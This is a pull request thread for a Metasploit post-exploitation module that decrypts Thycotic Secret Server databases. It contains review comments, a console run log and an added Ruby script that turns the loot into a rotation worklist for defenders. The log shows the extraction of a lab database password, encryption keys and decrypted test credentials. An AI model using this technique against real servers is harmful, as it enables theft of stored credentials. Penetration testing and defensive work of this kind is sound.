Add thycotic_secretserver_dump post module #16933
Initial commit for post module targeting Windows servers with Secret Server installed. The module can decrypt secrets from Secret Server version 10.4 - 11.2 provided they are not protected by HSM. An additional auxiliary module is being developed to perform offline decryption and recovery of the database using the loot extracted via this module.
I can make an unlicensed installer for SS 11.2 available for testing and validation if need be. Without a license only one user (the built-in admin account) is allowed, and advanced features like replication are disabled, but none of those things should impact this module.
Loot clarification changes are required; some other comments are recommendations or ideas for improvement.
One optional idea I will offer: a check method that evaluates the environment to confirm Secret Server is installed and the resources required are accessible might be better served to consolidate many of the fail_with(Msf::Exploit::Failure::NoTarget... conditions.
Hi, thanks for all the great feedback - I'm excited to report that I have recently been gifted installers for Secret Server 8.4 through 11.2, and have made a ton of improvements, fixes, and additional support based on some lab time with various builds. I will hopefully be making a commit soon that includes these changes as well as the revisions suggested here. Watch this space!
Re-worked version detection code after working with earlier builds of Secret Server. Removed the LastModifiedDate time stamp from the SQL query as it was not available in any but late versions. Added logic for dealing with SQL schema differences between versions. Added support for earlier builds of Secret Server, including pre-10.4 instances, which use different encryption mechanisms. Significant refactor of several methods to support legacy versions of Secret Server. Re-designed the workflow: module now has three actions, "export" dumps the encrypted CSV, "decrypt" will decrypt an exported CSV and "dump" (default) does both. Various bug-fixes and tweaks based on feedback. Changed some of the wording of output messages.
Just pushed a commit that has a bunch of changes plus new functional support.
Added much-needed support for SQL integrated authentication. Significant improvement to the decryption routine: better version detection and less churning through faulty decryption attempts. Various tweaks and optimizations based on feedback. Lots of bug fixes.
Added support for sessionless execution if the SESSION is set to -1. Misc cleanup.
Removed all logic around the isSalted column since I have no idea what that flag is actually supposed to represent. Further optimized Thycotic decryption method for efficiency. Fixed where the revision digit was being truncated after converting ss_build to float. Removed the offline 'decrypt' action as it required setting a reserved value for session in order to operate. Minor tweaks & correct typos and formatting. Updated documentation.
Just committed updates to the module and documentation, this should be close to shipshape. Let me know if anything merits further tweaking.
Significant refactor of exception handling: less 'fail_with', more 'return false'. Optimized interactions with SQL for less code redundancy. Removed references to LOOT_ONLY in the module info. Various tweaks and bug fixes.
@npm-cesium137-io, thank you so much for the well written module, and for making the changes previously suggested.
I was able to set up Secret Server 11.2 and tested the successful decryption of multiple different kinds of secrets stored on the server 👌
Everything looks good to me. I usually don't commit my own suggestions but in this case they're just typo fixes so I'm going to get those in and land.
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > set session 2
session => 2
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > run
[*] Hostname WIN-2EEL7BRDUD8 IPv4 172.16.199.132
[*] Decrypt database.config ...
[+] Secret Server SQL Database Connection Configuration:
[+] Instance Name: localhost\SQLEXPRESS
[+] Database Name: SecretServer
[+] Database User: sa
[+] Database Pass: lI8-.y1^qHM!C18f4-t865a^r6hWim8Nl2U
[*] Secret Server Build 11.22
[*] Decrypt encryption.config ...
[+] Secret Server Encryption Configuration:
[+] KEY: 6f59ccbd1ef3490a35099f8287d2704c
[+] KEY256: e4aff609f94fbda6556cc058647d3bdb351fc9bb447c0cb03a4d6b4fdac419d2
[+] IV: 5132b8cd4ac3aa1dbe0217fe30500b74
[*] Performing export of Secret Server SQL database to CSV file
[*] Export Secret Server DB ...
[+] 29 rows exported, 5 unique SecretIDs
[+] Encrypted Secret Server Database Dump: /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_234339.txt
[*] Performing decryption of Secret Server SQL database
[+] 29 rows loaded, 5 unique SecretIDs
[*] Process Secret Server DB ...
[+] 29 rows processed
[*] 15 rows recovered: 0 plaintext, 15 decrypted (14 blank)
[*] 15 rows written (14 blank rows withheld)
[+] 5 unique SecretID records recovered
[+] Decrypted Secret Server Database Dump: /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > cat /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
[*] exec: cat /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
SecretID,Active,SecretType,SecretName,FieldName,Plaintext,Plaintext2
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Machine,test,NULL
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Username,Shhh_its_a_secret,NULL
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Password,Shhh_its_a_secret,NULL
2,1,Active Directory Account,AD_account_secret,Domain,example.test.com,NULL
2,1,Active Directory Account,AD_account_secret,Username,msfuser,NULL
2,1,Active Directory Account,AD_account_secret,Password,N0tpassword@,NULL
3,1,Bank Account,I_have_lots_of_money,BankAccountNumber,1234123412341234,NULL
3,1,Bank Account,I_have_lots_of_money,TransitRoutingNumber,12341234,NULL
3,1,Bank Account,I_have_lots_of_money,NameOfBank,Cash_Money_Bank,NULL
4,1,MySql Account,SQL_secret,Server,sql_server,NULL
4,1,MySql Account,SQL_secret,Username,sa,NULL
4,1,MySql Account,SQL_secret,Password,SuperR00tP@ssword,NULL
5,1,z/OS Mainframe,MainFrameSecret,Machine,MainFrame,NULL
5,1,z/OS Mainframe,MainFrameSecret,Username,Hacker,NULL
5,1,z/OS Mainframe,MainFrameSecret,Password,youvebeenHACKED123!@#,NULL
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > options
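The decrypted loot file shown above is a flat CSV with one row per secret field (SecretID, Active, SecretType, SecretName, FieldName, Plaintext, Plaintext2), and the module's status lines report row counts, blank rows withheld and unique SecretIDs. The following is an added example, not code from the PR or from the Metasploit module, written from the incident-response side: it parses a loot file in that layout and produces a rotation worklist (which secrets, of which type, have populated credential fields) without ever copying the plaintext values into the summary. The constructed sample below uses made-up values; the helper names (parse_loot, loot_counts, rotation_worklist) and the treatment of the literal string NULL as an empty column are assumptions about the format, not documented behaviour.

```ruby
require 'csv'

# Constructed sample in the same column layout as the module's decrypted loot.
# Values are invented; an empty Plaintext cell and the literal "NULL" are both
# treated as "no value" (assumption based on the output shown in the PR).
SAMPLE_LOOT = <<~CSV
  SecretID,Active,SecretType,SecretName,FieldName,Plaintext,Plaintext2
  1,1,Unix Root Account (SSH),sample_ssh,Machine,host01.example.invalid,NULL
  1,1,Unix Root Account (SSH),sample_ssh,Username,root,NULL
  1,1,Unix Root Account (SSH),sample_ssh,Password,sample-not-real,NULL
  2,0,Active Directory Account,sample_ad_old,Username,svc_old,NULL
  2,0,Active Directory Account,sample_ad_old,Password,,NULL
  3,1,MySql Account,sample_sql,Username,sa,NULL
  3,1,MySql Account,sample_sql,Password,sample-not-real,NULL
CSV

# Field names that hold material a defender would need to rotate, not just
# descriptive context such as Machine or Domain (assumed list).
SENSITIVE_FIELDS = %w[Password BankAccountNumber PrivateKey].freeze

# Normalise a loot cell: nil, "" and "NULL" all mean "no value".
def blank_cell?(value)
  value.nil? || value.strip.empty? || value == 'NULL'
end

# Parse loot CSV text into an array of hashes keyed by the header names,
# with blank plaintext columns collapsed to nil.
def parse_loot(csv_text)
  CSV.parse(csv_text, headers: true).map do |row|
    h = row.to_h
    h['Plaintext']  = nil if blank_cell?(h['Plaintext'])
    h['Plaintext2'] = nil if blank_cell?(h['Plaintext2'])
    h
  end
end

# Counts in the spirit of the module's own status lines: total rows,
# rows with no recovered value, and distinct SecretIDs.
def loot_counts(rows)
  {
    rows: rows.size,
    blank: rows.count { |r| r['Plaintext'].nil? },
    unique_secrets: rows.map { |r| r['SecretID'] }.uniq.size
  }
end

# Build one summary entry per SecretID. Plaintext is deliberately not copied
# into the summary; only the names of populated fields are recorded.
def summarize_secrets(rows)
  rows.group_by { |r| r['SecretID'] }.map do |id, group|
    first = group.first
    {
      secret_id: id.to_i,
      name: first['SecretName'],
      type: first['SecretType'],
      active: first['Active'] == '1',
      populated_fields: group.reject { |r| r['Plaintext'].nil? }.map { |r| r['FieldName'] },
      blank_fields: group.select { |r| r['Plaintext'].nil? }.map { |r| r['FieldName'] }
    }
  end
end

# Rotation worklist: active secrets whose sensitive fields were recovered.
# Returns [secret_id, type, name] triples sorted by SecretID.
def rotation_worklist(rows)
  summarize_secrets(rows)
    .select { |s| s[:active] && (s[:populated_fields] & SENSITIVE_FIELDS).any? }
    .map { |s| [s[:secret_id], s[:type], s[:name]] }
    .sort_by(&:first)
end

if __FILE__ == $PROGRAM_NAME
  rows = parse_loot(SAMPLE_LOOT)
  c = loot_counts(rows)
  puts "#{c[:rows]} rows loaded, #{c[:blank]} blank, #{c[:unique_secrets]} unique SecretIDs"
  rotation_worklist(rows).each do |id, type, name|
    puts "rotate SecretID #{id} (#{type}): #{name}"
  end
end
```

Run it against a real loot file by replacing SAMPLE_LOOT with File.read of the path the module reports; the worklist gives the owning team a list of secret names and types to rotate while keeping the recovered plaintext out of tickets and chat.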
Release Notes: This PR adds a post-exploitation module that exports and decrypts Thycotic Secret Server credentials.
Initial commit for post module targeting Windows servers with Secret Server installed. Very potent if you manage to bag a vulnerable target! This should work against SS 10.4 through 11.2 but has only been tested against 11.2.